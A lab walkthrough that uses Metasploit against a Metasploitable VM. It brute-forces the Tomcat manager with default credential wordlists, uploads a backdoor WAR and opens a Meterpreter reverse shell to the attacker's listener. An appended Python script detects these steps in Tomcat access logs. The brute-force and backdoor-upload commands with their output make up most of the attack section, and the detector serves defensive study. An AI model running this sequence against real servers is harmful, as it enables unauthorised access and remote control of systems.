First we start off with a brute force of some username and password combinations against the Tomcat manager application on the target server.
msf5 > use auxiliary/scanner/http/tomcat_mgr_login
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                Required  Description
   ----              ---------------                                                                --------  -----------
   BLANK_PASSWORDS   false                                                                          no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                              yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                          no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                          no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                          no        Add all users in the current database to the list
   PASSWORD                                                                                         no        The HTTP password to specify for authentication
   PASS_FILE         /home/sam/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT             8080                                                                           yes       The target port (TCP)
   SSL               false                                                                          no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                          yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                                  yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                                              yes       The number of concurrent threads (max one per host)
   USERNAME                                                                                         no        The HTTP username to specify for authentication
   USERPASS_FILE     /home/sam/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                          no        Try the username as the password for all users
   USER_FILE         /home/sam/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
   VERBOSE           true                                                                           yes       Whether to print output for all attempts
   VHOST                                                                                            no        HTTP server virtual host

msf5 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf5 auxiliary(scanner/http/tomcat_mgr_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:vagrant (Incorrect)
[+] 192.168.56.101:8180 - Login Successful: tomcat:tomcat
[-] 192.168.56.101:8180 - LOGIN FAILED: both:both (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/tomcat_mgr_login) >
As you can see, one of the attempts against the remote server came back as Login Successful: tomcat:tomcat, a default credential pair from the module's wordlist. Our next step is to upload a backdoor through the manager application and get shell access.
msf5 > use exploit/multi/http/tomcat_mgr_upload
msf5 exploit(multi/http/tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Java Universal

msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword tomcat
HttpPassword => tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
HttpUsername => tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8180
RPORT => 8180
msf5 exploit(multi/http/tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying V84r2oLgqHQgPw...
[*] Executing V84r2oLgqHQgPw...
[*] Undeploying V84r2oLgqHQgPw ...
[*] Sending stage (53928 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.101:55925) at 2020-02-07 12:49:35 -0700

meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
python -c 'import pty;pty.spawn("/bin/bash")'
tomcat55@metasploitable:/$ pwd
pwd
/
tomcat55@metasploitable:/$
As you can see, we now have shell access on the server as the tomcat55 user, from which we can escalate our privileges with some other exploit.
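Both steps above leave a clear trail in Tomcat's access log: a burst of 401 responses on /manager/html from one client, then a 200 on the same URL, then a POST to /manager/html/upload by the authenticated account. The following detector, an added example and not part of the original post, parses lines in Tomcat's default AccessLogValve pattern (%h %l %u %t "%r" %s %b) and raises alerts for each of those three events; the threshold, window size, alert names and the sample log lines are all constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Tomcat AccessLogValve default pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # not in the expected format; skip it
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    ev["path"] = ev["path"].split("?", 1)[0]  # drop query (e.g. the CSRF nonce)
    return ev

def detect(lines, threshold=10, window=timedelta(minutes=5)):
    """Return (ip, alert) tuples for manager brute force, success after it, and WAR upload."""
    failures = defaultdict(list)  # ip -> timestamps of recent 401s on /manager/html
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None or not ev["path"].startswith("/manager"):
            continue
        ip, path, status = ev["ip"], ev["path"], ev["status"]
        if path == "/manager/html" and status == 401:
            ts = failures[ip]
            ts.append(ev["ts"])
            while ev["ts"] - ts[0] > window:  # keep only failures inside the window
                ts.pop(0)
            if len(ts) == threshold:  # fires once as the threshold is crossed
                alerts.append((ip, "manager_bruteforce"))
        elif path == "/manager/html" and status == 200 and len(failures[ip]) >= threshold:
            alerts.append((ip, "login_after_bruteforce"))
        elif path == "/manager/html/upload" and ev["method"] == "POST":
            alerts.append((ip, "war_upload_by_" + ev["user"]))
    return alerts

# Constructed sample log (not real data): ten failed manager logins in ten seconds, then a login and a WAR upload as 'tomcat'.
SAMPLE_LINES = [
    f'192.168.56.1 - - [07/Feb/2020:12:40:{s:02d} -0700] "GET /manager/html HTTP/1.1" 401 2473'
    for s in range(1, 11)
] + [
    '192.168.56.1 - tomcat [07/Feb/2020:12:40:12 -0700] "GET /manager/html HTTP/1.1" 200 17351',
    '192.168.56.1 - tomcat [07/Feb/2020:12:49:30 -0700] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 200 1234',
]
```

Running detect(SAMPLE_LINES) yields the brute-force alert on the tenth 401, the login-after-brute-force alert on the 200, and the upload alert naming the tomcat account; on a real deployment the same logic runs over the localhost_access_log files.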